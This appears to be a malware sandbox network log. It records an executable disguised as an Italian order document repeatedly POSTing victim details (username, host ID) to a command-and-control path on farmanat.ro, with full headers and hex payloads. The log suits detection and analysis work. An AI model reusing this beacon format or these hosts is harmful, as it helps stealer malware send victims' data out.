                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              109192.168.11.2049949176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:06.509232044 CET6466OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:06.542787075 CET6466OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:06.599896908 CET6466INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              11192.168.11.2049846176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:07.734355927 CET6321OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:07.768578053 CET6321OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:07.818254948 CET6321INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              110192.168.11.2049950176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:07.028729916 CET6467OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:07.062469006 CET6467OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:07.112368107 CET6468INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              111192.168.11.2049951176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:07.550026894 CET6468OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:07.584471941 CET6469OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:07.634911060 CET6469INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              112192.168.11.2049952176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:08.046701908 CET6470OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:08.080122948 CET6470OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:08.133228064 CET6470INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              113192.168.11.2049953176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:08.502494097 CET6471OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:08.536693096 CET6471OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:08.595326900 CET6472INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              114192.168.11.2049954176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:09.053477049 CET6472OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:09.087551117 CET6473OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:09.137372971 CET6473INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              115192.168.11.2049955176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:09.583941936 CET6474OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:09.617199898 CET6474OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:09.682661057 CET6474INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              116192.168.11.2049956176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:10.109386921 CET6475OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:10.143734932 CET6475OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:10.206259012 CET6476INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              117192.168.11.2049957176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:10.657392025 CET6476OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:10.691003084 CET6477OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:10.739757061 CET6477INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              118192.168.11.2049958176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:11.180607080 CET6478OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:11.214133978 CET6478OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:11.266808033 CET6478INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              119192.168.11.2049959176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:11.643884897 CET6479OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:11.677861929 CET6479OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:11.727848053 CET6480INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              12192.168.11.2049847176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:08.418318987 CET6322OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:08.451869965 CET6322OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:08.506304979 CET6323INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              120192.168.11.2049960176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:12.083952904 CET6480OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:12.117309093 CET6481OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:12.177886963 CET6481INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              121192.168.11.2049961176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:12.560857058 CET6482OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:12.594418049 CET6482OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:12.649662971 CET6482INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              122192.168.11.2049962176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:13.092994928 CET6483OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:13.126624107 CET6483OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:13.183248043 CET6484INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              123192.168.11.2049964176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:13.622407913 CET6491OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:13.656611919 CET6491OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:13.706809998 CET6491INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              124192.168.11.2049965176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:14.137401104 CET6492OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:14.171044111 CET6492OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:14.220704079 CET6493INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              125192.168.11.2049966176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:14.671375036 CET6494OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:14.705666065 CET6494OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
